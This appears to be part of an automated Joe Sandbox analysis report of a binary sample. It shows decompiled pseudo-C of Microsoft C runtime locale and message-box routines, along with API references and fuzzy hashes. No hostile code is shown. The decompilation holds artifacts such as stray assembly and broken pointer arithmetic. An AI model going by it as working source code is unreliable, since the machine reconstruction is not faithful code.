                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction ID: 095aece78304d225d391e1eee354350efbf9141cb11fa942de95b1040b824b20
                                                          • Opcode Fuzzy Hash: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction Fuzzy Hash: 9381ECB7E4110C7AE72697F08D47FEABBACA704B40F404622F755E7082FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E009A2703(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                          				char _t153;
                                                          				void* _t167;
                                                          				void* _t180;
                                                          				void* _t187;
                                                          				char* _t192;
                                                          				intOrPtr* _t195;
                                                          				signed int _t198;
                                                          				signed int _t199;
                                                          				signed int _t200;
                                                          				signed int _t201;
                                                          				signed int _t202;
                                                          				signed int _t203;
                                                          				signed int _t204;
                                                          				signed int _t205;
                                                          				signed int _t206;
                                                          				signed int _t207;
                                                          				signed int _t208;
                                                          				signed int _t209;
                                                          				signed int _t210;
                                                          				signed int _t211;
                                                          				signed int _t212;
                                                          				signed int _t213;
                                                          				signed int _t214;
                                                          				signed int _t215;
                                                          				signed int _t216;
                                                          				signed int _t217;
                                                          				intOrPtr* _t218;
                                                          				char* _t220;
                                                          				void* _t221;
                                                          				void* _t222;
                                                          
                                                          				_t180 = __ebx;
                                                          				_t222 = _t221 + 1;
                                                          				asm("in al, dx");
                                                          				_push(1);
                                                          				_t198 = E009B4CB1(__ebx, __edi, __esi);
                                                          				_t199 = _t198 | E009B4CB1(__ebx, __edi, _t198, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
                                                          				_t200 = _t199 | E009B4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
                                                          				_t201 = _t200 | E009B4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
                                                          				 *((intOrPtr*)(_t222 - 0xc)) =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
                                                          				_t202 = _t201 | E009B4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x18,  *((intOrPtr*)(_t222 + 8)) + 0x1c);
                                                          				_t203 = _t202 | E009B4CB1(__ebx, __edi, _t202, _t222 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x20);
                                                          				_t204 = _t203 | E009B4CB1(__ebx, __edi, _t203, _t222 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x24);
                                                          				_t205 = _t204 | E009B4CB1(__ebx, __edi, _t204, _t222 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t222 + 8)) + 0x28);
                                                          				_t206 = _t205 | E009B4CB1(__ebx, __edi, _t205, _t222 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t222 + 8)) + 0x29);
                                                          				_t207 = _t206 | E009B4CB1(__ebx, __edi, _t206, _t222 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t222 + 8)) + 0x2a);
                                                          				_t208 = _t207 | E009B4CB1(__ebx, __edi, _t207, _t222 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t222 + 8)) + 0x2b);
                                                          				_t209 = _t208 | E009B4CB1(__ebx, __edi, _t208, _t222 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t222 + 8)) + 0x2c);
                                                          				_t210 = _t209 | E009B4CB1(__ebx, __edi, _t209, _t222 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t222 + 8)) + 0x2d);
                                                          				_t211 = _t210 | E009B4CB1(__ebx, __edi, _t210, _t222 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t222 + 8)) + 0x2e);
                                                          				_t212 = _t211 | E009B4CB1(__ebx, __edi, _t211, _t222 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t222 + 8)) + 0x2f);
                                                          				_t213 = _t212 | E009B4CB1(__ebx, __edi, _t212, _t222 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t222 + 8)) + 0x38);
                                                          				_t214 = _t213 | E009B4CB1(__ebx, __edi, _t213, _t222 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x3c);
                                                          				_t215 = _t214 | E009B4CB1(__ebx, __edi, _t214, _t222 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x40);
                                                          				_t216 = _t215 | E009B4CB1(__ebx, __edi, _t215, _t222 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x44);
                                                          				_t217 = _t216 | E009B4CB1(__ebx, __edi, _t216, _t222 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x48);
                                                          				if((E009B4CB1(__ebx, __edi, _t217, _t222 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x4c) | _t217) == 0) {
                                                          					_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0xc))));
                                                          					while( *_t192 != 0) {
                                                          						_t153 =  *_t192;
                                                          						if(_t153 < 0x30 || _t153 > 0x39) {
                                                          							if(_t153 != 0x3b) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t220 = _t192;
                                                          								do {
                                                          									 *_t220 =  *((intOrPtr*)(_t220 + 1));
                                                          									_t220 = _t220 + 1;
                                                          								} while ( *_t220 != 0);
                                                          								continue;
                                                          							}
                                                          							L19:
                                                          							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
                                                          								asm("lock xadd [eax], ecx");
                                                          								if(_t187 == 1) {
                                                          									E009B2248( *((intOrPtr*)(_t180 + 0x84)));
                                                          									E009B2248( *((intOrPtr*)(_t180 + 0x78)));
                                                          								}
                                                          							}
                                                          							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t222 - 4));
                                                          							_t167 = 0;
                                                          							 *((intOrPtr*)(_t180 + 0x80)) = _t195;
                                                          							 *((intOrPtr*)(_t180 + 0x84)) = _t218;
                                                          							goto L23;
                                                          						} else {
                                                          							 *_t192 = _t153 - 0x30;
                                                          							L8:
                                                          							_t192 = _t192 + 1;
                                                          						}
                                                          					}
                                                          					_t218 =  *((intOrPtr*)(_t222 + 8));
                                                          					_t195 =  *((intOrPtr*)(_t222 - 8));
                                                          					 *_t218 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
                                                          					 *((intOrPtr*)(_t218 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
                                                          					 *((intOrPtr*)(_t218 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
                                                          					 *((intOrPtr*)(_t218 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
                                                          					 *((intOrPtr*)(_t218 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t222 - 4)))) = 1;
                                                          					if(_t195 != 0) {
                                                          						 *_t195 = 1;
                                                          					}
                                                          					_t187 = 0xffffffffffffffff;
                                                          					if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
                                                          						asm("lock xadd [edx], eax");
                                                          					}
                                                          					goto L19;
                                                          				} else {
                                                          					E009B842D( *((intOrPtr*)(_t222 + 8)));
                                                          					E009B2248( *((intOrPtr*)(_t222 + 8)));
                                                          					E009B2248( *((intOrPtr*)(_t222 - 4)));
                                                          					E009B2248( *((intOrPtr*)(_t222 - 8)));
                                                          					_t167 = 1;
                                                          				}
                                                          				L23:
                                                          				return _t167;
                                                          			}


































                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85D9
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85F0
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8607
                                                          • ___getlocaleinfo.LIBCMT ref: 009B861E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B863B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8652
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8669
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8680
                                                          • ___getlocaleinfo.LIBCMT ref: 009B869A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86B1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86C8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86DF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86F9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8710
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8727
                                                          • ___getlocaleinfo.LIBCMT ref: 009B873E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8758
                                                          • ___getlocaleinfo.LIBCMT ref: 009B876F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8786
                                                          • ___getlocaleinfo.LIBCMT ref: 009B879D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B87B7
                                                          • _free.LIBCMT ref: 009B87CD
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • _free.LIBCMT ref: 009B87D6
                                                          • _free.LIBCMT ref: 009B87DF
                                                          • _free.LIBCMT ref: 009B88A0
                                                          • _free.LIBCMT ref: 009B88A8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8448
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B845A
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B846C
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B847E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8490
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84A2
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84B4
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84C6
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84D8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84EA
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84FC
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B850E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8520
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                                                          • String ID:
                                                          • API String ID: 129311744-0
                                                          • Opcode ID: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction ID: ec7e1f363432fbeafe564d2c9f603ed1537927bb5a0de419b043ff16894b443a
                                                          • Opcode Fuzzy Hash: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction Fuzzy Hash: 866113B2E402087AEB30DBA8CD46FEF7BEC9B48B85F144510FA44FB182D5A4DA509675
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E009A1118(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr __edi, void* __esi) {
                                                          				intOrPtr* _t37;
                                                          				signed int _t40;
                                                          				char _t58;
                                                          				void* _t69;
                                                          				signed int _t78;
                                                          				signed int _t79;
                                                          				char* _t86;
                                                          				intOrPtr* _t91;
                                                          				signed int _t94;
                                                          				signed int _t95;
                                                          				signed int _t96;
                                                          				signed int _t97;
                                                          				intOrPtr _t98;
                                                          				char* _t99;
                                                          				void* _t100;
                                                          
                                                          				_t69 = __ebx;
                                                          				 *__eax =  *__eax + __eax;
                                                          				 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)(__edx + 4)) + __ecx;
                                                          				_t37 = E009B22C8(__edx, 4);
                                                          				 *((intOrPtr*)(_t100 - 0xc)) = _t37;
                                                          				if(_t37 == 0) {
                                                          					L5:
                                                          					E009B2248( *((intOrPtr*)(_t100 + 8)));
                                                          					E009B2248( *(_t100 - 4));
                                                          					_t40 =  *(_t100 - 8);
                                                          				} else {
                                                          					 *_t37 = __edi;
                                                          					_t90 =  *((intOrPtr*)(__ebx + 0xb0));
                                                          					_t94 = E009B4CB1(__ebx,  *((intOrPtr*)(__ebx + 0xb0)), __esi, _t100 - 0x14, 1,  *((intOrPtr*)(__ebx + 0xb0)), 0xe,  *((intOrPtr*)(_t100 + 8)));
                                                          					_t95 = _t94 | E009B4CB1(__ebx,  *((intOrPtr*)(__ebx + 0xb0)), _t94, _t100 - 0x14, 1, _t90, 0xf,  *((intOrPtr*)(_t100 + 8)) + 4);
                                                          					 *(_t100 - 8) =  *((intOrPtr*)(_t100 + 8)) + 8;
                                                          					_t96 = _t95 | E009B4CB1(__ebx, _t90, _t95, _t100 - 0x14, 1, _t90, 0x10,  *((intOrPtr*)(_t100 + 8)) + 8);
                                                          					_t97 = _t96 | E009B4CB1(__ebx, _t90, _t96, _t100 - 0x14, 2, _t90, 0xe,  *((intOrPtr*)(_t100 + 8)) + 0x30);
                                                          					if((E009B4CB1(__ebx, _t90, _t97, _t100 - 0x14, 2, _t90, 0xf,  *((intOrPtr*)(_t100 + 8)) + 0x34) | _t97) == 0) {
                                                          						_t86 =  *( *(_t100 - 8));
                                                          						while( *_t86 != 0) {
                                                          							_t58 =  *_t86;
                                                          							if(_t58 < 0x30 || _t58 > 0x39) {
                                                          								if(_t58 != 0x3b) {
                                                          									goto L10;
                                                          								} else {
                                                          									_t99 = _t86;
                                                          									do {
                                                          										 *_t99 =  *((intOrPtr*)(_t99 + 1));
                                                          										_t99 = _t99 + 1;
                                                          									} while ( *_t99 != 0);
                                                          									continue;
                                                          								}
                                                          								goto L21;
                                                          							} else {
                                                          								 *_t86 = _t58 - 0x30;
                                                          								L10:
                                                          								_t86 = _t86 + 1;
                                                          							}
                                                          						}
                                                          						_t91 =  *((intOrPtr*)(_t100 - 0xc));
                                                          						_t98 =  *((intOrPtr*)(_t100 + 8));
                                                          						_t78 =  *(_t100 - 4);
                                                          						 *_t78 = 1;
                                                          						if(_t91 != 0) {
                                                          							 *_t91 = 1;
                                                          						}
                                                          						_t79 = _t78 | 0xffffffff;
                                                          						if( *((intOrPtr*)(_t69 + 0x7c)) != 0) {
                                                          							asm("lock xadd [edx], eax");
                                                          						}
                                                          						if( *(_t69 + 0x78) != 0) {
                                                          							asm("lock xadd [eax], ecx");
                                                          							if(_t79 == 1) {
                                                          								E009B2248( *(_t69 + 0x78));
                                                          								E009B2248( *((intOrPtr*)(_t69 + 0x84)));
                                                          							}
                                                          						}
                                                          						 *(_t69 + 0x78) =  *(_t100 - 4);
                                                          						_t40 = 0;
                                                          						 *((intOrPtr*)(_t69 + 0x7c)) = _t91;
                                                          						 *((intOrPtr*)(_t69 + 0x84)) = _t98;
                                                          					} else {
                                                          						E009B8902( *((intOrPtr*)(_t100 + 8)));
                                                          						 *(_t100 - 8) =  *(_t100 - 8) | 0xffffffff;
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L21:
                                                          				return _t40;
                                                          			}



















                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009B89F9
                                                            • Part of subcall function 009B22C8: _malloc.LIBCMT ref: 009B22D9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A1E
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A35
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A4F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A66
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8A80
                                                          • ___free_lconv_num.LIBCMT ref: 009B8A8F
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B8918
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B892A
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B893C
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B894E
                                                            • Part of subcall function 009B8902: _free.LIBCMT ref: 009B8960
                                                          • _free.LIBCMT ref: 009B8A9C
                                                          • _free.LIBCMT ref: 009B8AA5
                                                          • _free.LIBCMT ref: 009B8B01
                                                          • _free.LIBCMT ref: 009B8B0C
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast___free_lconv_num__invoke_watson__malloc_crt_malloc
                                                          • String ID:
                                                          • API String ID: 3887541295-0
                                                          • Opcode ID: 89a3d1282ca47a462c78de416b8e8aef0bc1fe52bf7d11eaebc0d0d4f47cf5de
                                                          • Instruction ID: 526dcfd86429b21713f264a25215a98350eb752caef51487fad0fcdb98f5e2ef
                                                          • Opcode Fuzzy Hash: 89a3d1282ca47a462c78de416b8e8aef0bc1fe52bf7d11eaebc0d0d4f47cf5de
                                                          • Instruction Fuzzy Hash: 7F2180729402097BEB24DBA4CD46FEE7BACDB45B60F144525FA04FB182EAB0DA40D761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009BE8C3(short _a4, intOrPtr _a8) {
                                                          				short _t13;
                                                          				short _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				if(_t28 != 0 &&  *_t28 != 0 && E009BDB28(_t28, ?str?) != 0) {
                                                          					if(E009BDB28(_t28, ?str?) != 0) {
                                                          						return E009BEFC5(_t28);
                                                          					}
                                                          					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                          						L9:
                                                          						return 0;
                                                          					}
                                                          					return _a4;
                                                          				}
                                                          				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t13 = _a4;
                                                          				if(_t13 == 0) {
                                                          					return GetACP();
                                                          				}
                                                          				return _t13;
                                                          			}






                                                          APIs
                                                          • _wcscmp.LIBCMT ref: 009BE8DA
                                                          • _wcscmp.LIBCMT ref: 009BE8EB
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE907
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE931
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale_wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 1351282208-711371036
                                                          • Opcode ID: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction ID: a98c23c952848ed0f01ce3e33c39dce27c8b2c164c49f25d784f8634b24c9acf
                                                          • Opcode Fuzzy Hash: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction Fuzzy Hash: 66012832209215BAEB549F94DD41FEA37DCDF04774F004415F909DA191E730EE84C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E009A320D(void* __eax, void* __ebx, void* __ecx) {
                                                          				void* _t57;
                                                          
                                                          				_t57 = __ebx;
                                                          				asm("pushfd");
                                                          				 *((intOrPtr*)(__ebx + 0x75ff85f8)) =  *((intOrPtr*)(__ebx + 0x75ff85f8)) + __ecx;
                                                          				GetLastError();
                                                          			}




                                                          0x009a320d
                                                          0x009b5837
                                                          0x009b5838
                                                          0x009b583e

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 009B583E
                                                          • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5855
                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B586B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B587A
                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5887
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B588E
                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B589B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58A2
                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58AF
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58B6
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58C7
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58CE
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58D8
                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
